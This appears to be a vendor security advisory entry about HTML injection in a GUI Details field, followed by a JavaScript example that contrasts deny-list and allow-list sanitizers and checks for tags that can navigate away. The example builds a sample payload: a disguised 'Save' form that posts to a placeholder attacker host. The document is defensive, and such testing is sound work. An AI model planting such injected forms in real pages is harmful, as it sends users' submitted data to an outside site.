# EIQ-2018-0017

| Field | Value |
|---|---|
| ID | EIQ-2018-0017 |
| CVE | - |
| Description | HTML injection through the GUI |
| Date | 05 Jun 2019 |
| Severity | 2 - MEDIUM |
| CVSSv3 score | CVSSv3 score not available on NIST NVD. |
| Status | ✅ 2.5.0 |
| Assessment | Some manual input fields in the GUI parse HTML instead of rendering it as raw source. For example, this occurs in the Details input field of a workspace dashboard view when users are in edit mode. The input is sanitized to prevent cross-site scripting (XSS) injection attacks, but it is still possible to inject HTML containing redirects. As a consequence, a form submission button can be injected with HTML that redirects to external sites and resources. |
| Mitigation | - |
| Affected versions | 2.3.0 to 2.4.0 included. |
| Notes | Former refs: 25750; 36511. This issue was closed as solved in release 2.4.0. However, the problem persisted. We reopened it, with a planned solution available in release 2.5.0. Note: the date in the Date field refers to the point in time when the issue was reopened. |
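The gap described in the Assessment, as an added illustration that is not EclecticIQ code: a deny-list sanitizer that only strips scripts and event handlers still lets a `<form>` posting to an external origin through, whereas an allow-list of formatting tags (no attributes) renders such markup as text. The tokenizer, tag set and sample payload below are constructed for this example, not taken from the product.

```javascript
// Toy tag tokenizer for illustration only, not a real HTML parser.
const TAG_RE = /<\/?([a-zA-Z][a-zA-Z0-9-]*)\b([^>]*)>/g;

function escapeHtml(s) {
  return s.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Weak policy (deny-list): blocks script execution only. Markup that can
// submit or navigate to another origin, such as <form action=...>, survives.
function sanitizeWeak(html) {
  return html.replace(TAG_RE, (tag, name) => {
    if (name.toLowerCase() === "script") return "";
    // Drop inline event handlers like onclick="..." or onsubmit=...
    return tag.replace(/\s+on[a-z]+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, "");
  });
}

// Strict policy (allow-list): only simple formatting tags, with all
// attributes stripped. <form>, <a>, <meta>, <iframe>, <input> are escaped.
const ALLOWED = new Set(["b", "i", "em", "strong", "p", "br", "ul", "ol", "li"]);

function sanitizeStrict(html) {
  return html.replace(TAG_RE, (tag, name) => {
    const n = name.toLowerCase();
    const closing = tag.startsWith("</");
    return ALLOWED.has(n) ? `<${closing ? "/" : ""}${n}>` : escapeHtml(tag);
  });
}

// Review check: does sanitized output still contain navigation-capable tags?
const NAV_TAGS = /<(form|a|meta|iframe|base|button)\b/i;
function hasNavigation(html) {
  return NAV_TAGS.test(html);
}

// Constructed sample: a field value that looks like a harmless "Save" button
// but would post the form to an external site. attacker.invalid is a placeholder.
const injected =
  '<b>Details</b><form action="https://attacker.invalid/collect">' +
  '<input type="submit" value="Save"></form><script>alert(1)</script>';

console.log("weak  :", sanitizeWeak(injected), hasNavigation(sanitizeWeak(injected)));
console.log("strict:", sanitizeStrict(injected), hasNavigation(sanitizeStrict(injected)));
```

Running it shows the weak policy produces output with no `<script>` yet still a live `<form>` to an external origin, which is exactly the condition the advisory describes; the strict policy keeps `<b>Details</b>` and nothing else renders as markup.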